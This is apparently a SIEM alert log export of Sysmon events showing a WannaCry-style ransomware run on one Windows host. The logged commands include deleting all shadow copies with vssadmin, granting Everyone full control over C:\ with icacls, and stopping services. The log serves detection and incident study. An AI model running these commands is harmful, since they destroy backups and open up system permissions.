Service"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""VSSADMIN.EXE"",""commandLine"":""vssadmin.exe Delete Shadows /all /quiet"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:17.064",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:04.844 +ProcessGuid: {df9fc3d3-1a94-5ec9-0000-00100e580c00} +ProcessId: 6820 +Image: C:\Windows\System32\icacls.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: iCACLS.EXE +CommandLine: icacls ""C:\*"" /grant Everyone:F /T /C /Q +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","icacls \""C:\\*\"" /grant Everyone:F /T /C /Q","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:04.924985800Z"",""eventRecordID"":""1613"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:04.844\r\nProcessGuid: {df9fc3d3-1a94-5ec9-0000-00100e580c00}\r\nProcessId: 6820\r\nImage: C:\\Windows\\System32\\icacls.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: iCACLS.EXE\r\nCommandLine: icacls \""C:\\*\"" /grant Everyone:F /T /C /Q\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:04.844"",""processGuid"":""{df9fc3d3-1a94-5ec9-0000-00100e580c00}"",""processId"":""6820"",""image"":""C:\\\\Windows\\\\System32\\\\icacls.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""iCACLS.EXE"",""commandLine"":""icacls \\\""C:\\\\*\\\"" /grant Everyone:F /T /C /Q"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:15.358",9,"Windows Application error event","""Faulting application name: sihost.exe, version: 10.0.18362.1, time stamp: 0xe9587576 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xe10 +Faulting application start time: 0x01d630ffc1053bff +Faulting application path: C:\Windows\system32\sihost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: e0bbd6c8-ffc1-49b3-b717-c3512b541a5a +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:44:10.918",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:43:59.058 +ProcessGuid: {df9fc3d3-1a8f-5ec9-0000-001044a70b00} +ProcessId: 6560 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010967b0b00} +ParentProcessId: 6420 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:43:59.101506700Z"",""eventRecordID"":""1586"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:43:59.058\r\nProcessGuid: {df9fc3d3-1a8f-5ec9-0000-001044a70b00}\r\nProcessId: 6560\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010967b0b00}\r\nParentProcessId: 6420\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:43:59.058"",""processGuid"":""{df9fc3d3-1a8f-5ec9-0000-001044a70b00}"",""processId"":""6560"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1a8e-5ec9-0000-0010967b0b00}"",""parentProcessId"":""6420"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:44:10.912",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:43:58.730 +ProcessGuid: {df9fc3d3-1a8e-5ec9-0000-00103c8e0b00} +ProcessId: 6504 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010df6b0b00} +ParentProcessId: 6380 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:43:58.757889900Z"",""eventRecordID"":""1585"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:43:58.730\r\nProcessGuid: {df9fc3d3-1a8e-5ec9-0000-00103c8e0b00}\r\nProcessId: 6504\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010df6b0b00}\r\nParentProcessId: 6380\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:43:58.730"",""processGuid"":""{df9fc3d3-1a8e-5ec9-0000-00103c8e0b00}"",""processId"":""6504"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1a8e-5ec9-0000-0010df6b0b00}"",""parentProcessId"":""6380"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:44:10.851",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:43:58.412 +ProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010967b0b00} +ProcessId: 6420 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:43:58.436877100Z"",""eventRecordID"":""1581"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:43:58.412\r\nProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010967b0b00}\r\nProcessId: 6420\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:43:58.412"",""processGuid"":""{df9fc3d3-1a8e-5ec9-0000-0010967b0b00}"",""processId"":""6420"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:44:05.183",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:43:58.082 +ProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010df6b0b00} +ProcessId: 6380 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:43:58.133212600Z"",""eventRecordID"":""1580"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:43:58.082\r\nProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010df6b0b00}\r\nProcessId: 6380\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:43:58.082"",""processGuid"":""{df9fc3d3-1a8e-5ec9-0000-0010df6b0b00}"",""processId"":""6380"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:43:30.367",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 23, 2020 @ 12:43:24.516",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 23, 2020 @ 12:42:28.913",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-23 12:42:28.085 +ProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #0 +Details: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:42:28.094377700Z"",""eventRecordID"":""1397"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-23 12:42:28.085\r\nProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #0\r\nDetails: C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-23 12:42:28.085"",""processGuid"":""{df9fc3d3-d0cd-5ec7-0000-001050a30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #0"",""details"":""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""}}}" +"May 23, 2020 @ 12:42:23.366",10,"Multiple System error events","""The server {D63B10C5-BB46-4990-A94F-E40B9D520160} did not register with DCOM within the required timeout.""",, +"May 23, 2020 @ 12:42:20.152",10,"Multiple System error events","""The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.""",, +"May 23, 2020 @ 12:42:10.740",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:24:02.379 +ProcessGuid: {df9fc3d3-d272-5ec7-0000-0010d96a4700} +ProcessId: 295872 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d272-5ec7-0000-00100e654700} +ParentProcessId: 295780 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:02.382954200Z"",""eventRecordID"":""1366"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:24:02.379\r\nProcessGuid: {df9fc3d3-d272-5ec7-0000-0010d96a4700}\r\nProcessId: 295872\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 